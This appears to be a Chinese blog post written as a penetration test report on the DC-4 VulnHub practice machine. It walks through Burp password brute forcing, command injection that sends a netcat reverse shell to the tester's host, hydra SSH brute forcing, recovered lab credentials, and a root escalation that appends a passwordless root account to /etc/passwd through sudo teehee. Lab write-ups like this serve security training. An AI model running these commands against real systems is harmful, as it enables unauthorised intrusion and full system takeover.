首页 > 其他分享 >DC4靶机渗透测试报告

DC4靶机渗透测试报告

时间:2024-07-17 11:11:03浏览次数:8  
标签:charles 测试报告 admin jim 用户 密码 靶机 root DC4

概述

测试目的

测试范围

序号

系统

IP

1

本地

192.168.152.128

2

靶机DC4

192.168.152.134

详细测试流程

1、发现测试目标

2、信息收集

开放了22端口和80端口

访问80端口,发现没什么可用的,就用BP暴力破解

最后得到密码是happy

登录

3、漏洞利用

登录以后可以看到有执行命令的单选框,这个时候我们选择第一个列出当前目录的文件,然后在BP里面查看相应的数据包,可以看到在radio参数里面就是执行的命令,然后用加号替换空格

先将这个数据包发送到repeater可以按下ctrl+r

然后我们将radio参数里面的命令进行替换,换成

nc+192.168.152.128+1234+-e+/bin/sh

在发包之前先在kali上面执行nc –lvnp 1234

192.168.152.128是kali的ip地址,1234是开放监听的端口

获得一个shell

用python稳定化shell,获得交互式shell

我们先回到家目录发现有三个用户,以及在jim目录下面发现有一个密码字典

保存下来用户名和密码

用hydra暴力破解

hydra –L user.txt –P pass.txt 192.168.152.134 ssh

jim/jibril04

仔细看,在登录以后提示有新邮件

输入mail命令

进入到邮件对应的目录并打开邮件

得到了carles的密码^xHhA&hvim0y

carles/^xHhA&hvim0y

Linux里面mail邮件的用法https://blog.csdn.net/weixin_34765773/article/details/116642547

4、提权

在jim用户里面用sudo和suid提权都失败

但是在charles用户里面用sudo –l发现有个以root权限运行的命令

查看/etc/passwd文件,直接追加内容添加一个具有root权限的用户

添加了一个admin用户,密码为空

echo "admin::0:0:admin:/root:/bin/bash" | sudo teehee -a /etc/passwd

添加了一个无密码的具有root权限的用户admin

这里我尝试了在jim和charles里面用su命令切换到admin都失败了,后面还试过添加其他用户,发现用su命令都不可以切换

后面想着试一下用添加的用户直接登录靶机,发现直接就成功了,并且具有root权限

漏洞详情和修复建议

漏洞风险

High

漏洞描述

对登录没有次数限制,可以爆破密码

漏洞修复

限制登录次数,加强口令强度

测试结果综述

访问80端口,利用BP暴力破解账号密码,进入以后修改执行命令请求包,反弹shell,利用python获得交互shell。找到3个账号和一个密码字典,利用hydra破解得到jim的密码。

然后ssh连接jim发现有邮件,在邮件里面发现了charles的密码,连接上了以后分别在jim和charles上面尝试了sudo和suid提权,都失败。最后在charles发现有一个具有root权限的命令,利用这个命令,添加上具有root权限的用户admin.最后在靶机上直接登录成功。

标签:charles,测试报告,admin,jim,用户,密码,靶机,root,DC4
From: https://www.cnblogs.com/cll-wlaq/p/18306867

相关文章

  • DC5靶机渗透测试报告
    概述测试目的测试范围序号系统IP1本机192.168.152.1282DC5靶机192.168.152.136详细测试流程1、发现测试目标2、信息收集3、漏洞利用访问80端口,这个页面我什么都没有发现,目录扫描好像也没什么用没办法,看一下大佬的WPVulnHub靶机DC-5打靶渗透测试详细过程_dc-5主机渗透试验-CSDN......
  • DC1主机渗透测试报告
    概述测试目的通过模拟黑客的渗透测试,评估目标系统是否存在可以被攻击者真实利用的漏洞以及由此引起的风险大小,为制定相应的安全措施与解决方案提供实际的依据。分析客户WEB应用系统的安全现状,检测WEB应用系统的漏洞和安全问题,并验证其他已知的脆弱点。对系统的任何弱点、技术缺陷......
  • 学之思系统测试报告(接口测试postman+性能测试jmeter+自动化测试selenium)
    学之思系统测试报告(接口测试postman+性能测试jmeter+自动化测试selenium)自动化测试脚本和执行学之思管理端+学之思学生端每个测试均需提交测试用例文档接口测试用例接口测试需要有缺陷文档性能测试每个接口需要提供聚合报告(每次请求前,清理数据)(测试计划+功......
  • 性能测试:性能测试报告
    简介性能测试报告是性能测试的产出物之一,它是对系统性能测试结果和数据的总结和分析,记录了系统在不同负载和场景下的性能表现和性能问题。性能测试报告提供了有关系统性能的详细信息,供项目团队、开发人员和其他相关利益相关者参考。性能测试报告作用性能测试报告的输出是非常重......
  • Hacknos-OS-Hax靶机
    靶机地址:https://www.vulnhub.com/entry/hacknos-os-hax,389/一、信息收集步骤一:导入并配置靶机为桥接模式而后开启...获取其MAC地址信息...如下:步骤二:主机发现nmap192.168.7.0/24对应靶机的MAC地址得到IP为192.168.7.204步骤三:端口扫描nmap-sV-p-192.168.7.204......
  • vulnhub靶机网卡配置问题
    vulnhub靶机网卡配置问题靶机来源——ICA-1vulnhub下载地址:https://www.vulnhub.com/entry/ica-1,748/描述:debian系统(linux)1.3GB下载的是OVA文件,导入虚拟机进行NAT网络配置,可以全局访问用kali攻击机arp-scan探测不到ip,应该是debian网卡配置问题,没有分配到ip正常......
  • jmeter分布式no-gui 测试报告
    1、远程测试https://jmeter.apache.org/usermanual/remote-test.html 2、 3、进行分布式压测是,服务器需要先启动jmeter-sever,启动jmeter-sever建议加上nobup,后开运行,停止服务时,先停master,在停slave,不然可能有问题。linux上具体的压测命令如下:只有一台服务时,若堡垒机可......
  • 记pWnOS1.0靶机渗透测试
    前言学校给开的培训课的作业,正好记录一下。我自己拿不到root权限,所以还是参考了一下别人的教程参考:红队打靶:pWnOS1.0打靶思路详解之webmin漏洞利用(vulnhub)_pwnos1.0靶机-CSDN博客pWnOS1.0查看靶机网络先查看kali的ip:ifconfigapr扫描获取该网段所有主机扫描后可以知......
  • 【第7个渗透靶机项目】 DerpNStink
    Hackit信息搜集发现主机 nmap192.168.0.17-sS-sV-A-T5全面扫描一下,有点有用信息访问一下但是没有用。访问一下http服务查看源代码,发现有文件泄露下面还有个flag查看info.txt。<--@stinky,确保使用本地dns更新您的主机文件,以便可以在新的derpnstink博客......
  • 压力测试报告模版
    压力测试模版版本历史版本号修订内容修改人内容摘要:结合渠道测试特色,介绍渠道压力测试报告中,应包含且不限于文档中的压测信息点。压测结论及分析:1.压测结论:压力测试是否达标,说明详细的达标情况,目标TPS值,等。2.压测分析:压测瓶颈点,及产生的原因压测过程中,发现的其他结......